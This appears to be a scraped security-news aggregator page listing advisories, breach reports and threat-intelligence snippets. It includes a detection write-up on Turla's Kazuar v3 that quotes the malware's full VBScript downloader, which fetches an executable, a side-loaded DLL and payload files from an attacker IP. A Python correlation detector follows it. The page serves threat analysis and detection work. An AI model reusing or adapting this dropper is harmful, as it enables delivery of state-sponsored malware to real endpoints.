The most relevant and recent events in the world of information security https://malware.news All Projects: malwarecorp.com This channel is run by AI and BOT
Secure Access Service Edge (SASE)
What is Secure Access Service Edge? Secure Access Service Edge (SASE) is a cloud-based approach that combines networking and security into one service so people can safely connect to company resources from anywhere. SASE represents a fundamental shift in how organizations approach network security and connectivity in today’s distributed work environment. Rather than treating networking ...
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.
Check Point Unveils a New Security Strategy for Enterprises in the AI Age
NDSS 2025 – Density Boosts Everything
Session 12B: Malware
Google Chrome security advisory (AV26-126)
Serial number: AV26-126
Date: February 13, 2026
Detection: Satellite DLL SideLoading via MFC — TURLA'S KAZUAR V3
Hello everyone.
Turla’s Kazuar is a .NET malware family attributed to Russian state-sponsored actors that, in recent campaigns, has taken DLL SideLoading a step further by leveraging certain MFC binaries compiled between Visual Studio .NET 2002 and Visual Studio 2010. These binaries attempt to load satellite DLLs in an insecure way due to an incorrect path specification, improper handling of data during loading, and a very curious “fallback” logic.
In this article we will model the early stages of the kill chain of this attack on a Windows endpoint, from the initial vector to the loader, where we will observe:
— Dropping files into user-writable paths (AppData/Temp/ProgramData) originating from scripting engines.
— Execution of a legitimate binary from an anomalous location.
— The loading of a DLL by the previous binary, both sharing a very similar naming convention.
— How these drop, load, and execution events show a clear correlation when modeling detection.
Let’s rock!
OVERVIEW — GENERAL FUNCTIONS
Execution begins with a Visual Basic script without encoded strings; at first glance it may seem harmless. It is unknown whether the user executed the script as a result of social engineering or whether it was launched programmatically after a previous foothold.
'On Error Resume Next
const SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS = 13056
host = "https://185.126.255[.]132"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver")
conc = host + "/hpbprndi.exe"
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
Set WSHShell = CreateObject("WScript.Shell")
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndi.exe"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/hpbprndiLOC.dll"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndiLOC.dll"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/jayb.dadk"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\jayb.dadk"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/kgjlj.sil"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\kgjlj.sil"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close
conc = host + "/pkrfsu.ldy"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\pkrfsu.ldy"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile,...
https://malware.news/t/detection-satelital-dll-sideloading-via-mfc-turla-s-kazuar-v3/104106
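The drop, execute and load correlation the article proposes, as an added Python example that is not the article's own code: it runs over constructed, simplified Sysmon-style events (FileCreate 11, ProcessCreate 1, ImageLoad 7; field names, sample paths and PIDs are assumptions) that mirror the dropper sequence above, and flags a legitimate binary run from a user-writable path that then loads a similarly named DLL dropped beside it by the same script engine.

```python
import ntpath
import re

# Script engines whose file writes into user-writable paths we treat as "drops".
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata)\\", re.IGNORECASE)


def stem(path):
    """Lower-cased file name without extension, e.g. 'hpbprndi' for hpbprndi.exe."""
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def looks_like_satellite(exe, dll):
    """Satellite-DLL naming: the DLL name starts with the EXE's stem (hpbprndi.exe / hpbprndiLOC.dll)."""
    return stem(dll).startswith(stem(exe))


def correlate(events):
    """Return one finding per EXE that (1) was written by a script engine into a user-writable
    path, (2) was then executed from that path and (3) loaded a similarly named DLL that the
    same engine dropped into the same directory."""
    dropped = {}  # lower-cased target path -> image of the script engine that wrote it
    for e in events:
        if e["id"] == 11 and ntpath.basename(e["image"]).lower() in SCRIPT_ENGINES \
                and USER_WRITABLE.search(e["target"]):
            dropped[e["target"].lower()] = e["image"]
    started = {}  # pid -> exe path, for processes launched from a dropped file
    for e in events:
        if e["id"] == 1 and e["image"].lower() in dropped:
            started[e["pid"]] = e["image"]
    findings = []
    for e in events:
        if e["id"] != 7 or e["pid"] not in started:
            continue
        exe, dll = started[e["pid"]], e["loaded"]
        same_dir = ntpath.dirname(exe).lower() == ntpath.dirname(dll).lower()
        if dll.lower() in dropped and same_dir and looks_like_satellite(exe, dll):
            findings.append({"dropper": dropped[exe.lower()], "exe": exe, "dll": dll, "pid": e["pid"]})
    return findings


# Constructed sample telemetry (assumed field names), modelled on the VBScript drop sequence.
BASE = r"C:\Users\alice\AppData\Local\Programs\HP\Printer\Driver"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
SAMPLE_EVENTS = [
    {"id": 11, "image": WSCRIPT, "pid": 4120, "target": BASE + r"\hpbprndi.exe"},
    {"id": 11, "image": WSCRIPT, "pid": 4120, "target": BASE + r"\hpbprndiLOC.dll"},
    {"id": 1, "image": BASE + r"\hpbprndi.exe", "pid": 5208},
    {"id": 7, "image": BASE + r"\hpbprndi.exe", "pid": 5208, "loaded": r"C:\Windows\System32\mfc42.dll"},
    {"id": 7, "image": BASE + r"\hpbprndi.exe", "pid": 5208, "loaded": BASE + r"\hpbprndiLOC.dll"},
    # Benign control: an installer (not a script engine) writing under Program Files.
    {"id": 11, "image": r"C:\Windows\System32\msiexec.exe", "pid": 900, "target": r"C:\Program Files\Tool\tool.exe"},
    {"id": 1, "image": r"C:\Program Files\Tool\tool.exe", "pid": 901},
    {"id": 7, "image": r"C:\Program Files\Tool\tool.exe", "pid": 901, "loaded": r"C:\Program Files\Tool\toolENU.dll"},
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Only the chain under %LOCALAPPDATA% is reported; the installer chain, which shares the naming pattern but not the script-engine drop into a user-writable path, is left alone.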
PostgreSQL security advisory (AV26-125)
Serial number: AV26-125
Date: February 13, 2026
Korea’s Personal Information Protection Commissioner fines 3 LVMH luxury brands after Salesforce data breaches
The South Korean regulator has imposed fines on three LVMH luxury brands in the wake of data breaches previously reported on this site. A machine translation of the South Korean notice indicates that the Personal Information Protection Commission imposed fines of 36.033 billion won (USD $24,925,824.15) and penalties of 10.8 million won (USD $7,472.78) on three luxury...
Top Nation-State Cyber Threats Targeting the United States
Fake shops target Winter Olympics 2026 fans
If you’ve seen the two stoat siblings serving as official mascots of the Milano Cortina 2026 Winter Olympics, you already know Tina and Milo are irresistible.
AI-Powered Knowledge Graph Generator & APTs, (Thu, Feb 12th)
Unstructured text to interactive knowledge graph via LLM & SPO triplet extraction
AI Weaponization: State Hackers Using Google Gemini for Espionage and Malware Generation
What Happened Google’s Threat Intelligence Group (GTIG) has confirmed that multiple state-sponsored hacking groups are actively using its Gemini large language model (LLM) to enhance their cyber espionage and attack capabilities. The activity spans reconnaissance, social engineering, vulnerability analysis, and the dynamic generation of malicious code. North Korean (UNC2970/Lazarus Group), Chinese (Mustang Panda, APT31, APT41), [...]
The Most Important Thing I’ve Read This Year
Lawyers and judges need to stop snickering at the sad sacks who file briefs citing hallucinated authorities and treating those ...
It’s 2026, but hospitals still haven’t prevented snooping in celebrities’ records
DataBreaches is not on TikTok and, being something of a dinosaur, never heard of “Josh and Jase” before. But no patient should have their privacy violated the way Josh’s was. What happened to “break the glass”? What happened to all the software and auditing protections to prevent hospital employees from snooping on celebrity patients’ records?...
ApolloMD reveals that 626,540 patients were affected by May, 2025 cyberattack
There is an update to a breach previously reported on DataBreaches.net. ApolloMD describes itself as a private, independent group of physicians that partners with more than 100 hospitals nationwide to provide integrated, multispecialty physician, Ambulatory Payment Classifications (APCs), and practice management services. As such, they are business associates of HIPAA-covered entities. This week, the Georgia-based...
Threat Intelligence Snapshot: Week 7, 2026
QuoIntelligence’s Weekly Intelligence Snapshot for the week of 5 to 11 February 2026 is now available!
South Korea blames Coupang data breach on management failure, not sophisticated attack
Heekyong Yang and Hyunjoo Jin report: South Korean officials blamed a massive data leak last year at Coupang on management failure, rather than a sophisticated cyberattack, and urged the e-commerce giant to fix vulnerabilities in its security systems. Announcing the first findings of a government-led probe, the Science Ministry said on Tuesday a former Coupang...
CISA to furlough most of its workforce under impending DHS shutdown
A likely partial government shutdown after Friday would impair the Cybersecurity and Infrastructure Security Agency’s operations, leading to diminished capabilities in critical areas including cyber response, security assessments, stakeholder engagements, training exercises and special event planning, a top official said this week.
HPE security advisory (AV26-127)
Serial number: AV26-127
Date: February 13, 2026
Summary of malicious campaigns in the week of 7 – 13 February
This week, CERT-AGID detected and analysed, within the Italian scenario it monitors, a total of 108 malicious campaigns, 68 of them with Italian targets and 40 generic ones that nonetheless affected Italy, and made the related 882 indicators of compromise (IoC) it identified available to its accredited entities.
MITRE ATT&CK® Framework Beginners Guide
How to find and remove credential-stealing Chrome extensions
Researchers have found yet another family of malicious extensions in the Chrome Web Store. This time, 30 different Chrome extensions were found stealing credentials from more than 260,000 users.
Installed extensions can be reviewed at chrome://extensions/ or on disk under C:\Users\<your-username>\AppData\Local\Google\Chrome\User Data\Default\Extensions.
IRS Improperly Shares Immigrants’ Data with ICE: Explained
Erin Schilling and Erin Slowey report: The IRS’ improper disclosure of thousands of immigrants’ personal information to the Department of Homeland Security fulfilled early warnings that the data-sharing deal between the agencies would put taxpayer data at risk. The IRS and DHS in April 2025 agreed to share data of immigrants to help with criminal...
AI-Driven Threats Targeting U.S. Organizations
UK’s Digital ID U-Turn: What It Means for Security
The UK government has quietly backed away from one of its most controversial policies: making a national digital ID mandatory for anyone who wants to work in the country. Prime Minister Keir Starmer’s Brit Card plan would have required every working adult to hold a digital identity document on their phone by 2029, as part of a broader crackdown on illegal work and immigration.
ISC Stormcast For Friday, February 13th, 2026 https://isc.sans.edu/podcastdetail/9808, (Fri, Feb 13th)
NDSS 2025 – PBP: Post-Training Backdoor Purification For Malware Classifiers
Session 12B: Malware
From Operations to Policy: Contributing to the Global Fight Against Ransomware
Today, the government of Canada issued a statement announcing that Arctic Wolf will continue to co-chair the Counter Ransomware Initiative Public-Private Sector Advisory Panel in 2026, alongside Public Safety Canada and BlackBerry. The panel will also include member organizations such as Ensign InfoSecurity, the Institute for Security and Technology, Microsoft, Palo Alto Networks, and the Royal United Service Institute. Why Global Collaboration Is Essential for Modern Ransomware Defense ...
RONDHUIT and US-based BasisTech enter into a capital and business alliance
The post RONDHUIT and US-based BasisTech enter into a capital and business alliance appeared first on BasisTech.
Kettering Adventist Health now notifying patients affected by May 2025 ransomware attack
On May 20, 2025, CNN reported that a ransomware attack had triggered a “system-wide technology outage” at Kettering Adventist Health in Ohio. Disclosures by Kettering Health would later explain that the healthcare system had been attacked by InterLock, a ransomware gang who were threatening to destroy data and publish data if their demands were not...
Arctic Wolf Product Updates: February 2026
The most effective security operations aren’t built by buying more tools. They’re built by making the tools you already have work better together. We hear from our customers that their security teams need to extract maximum value from their technology while operating more efficiently than ever. This quarter, Arctic Wolf doubled down on three areas to support these efforts: smarter integrations, clearer visibility, ...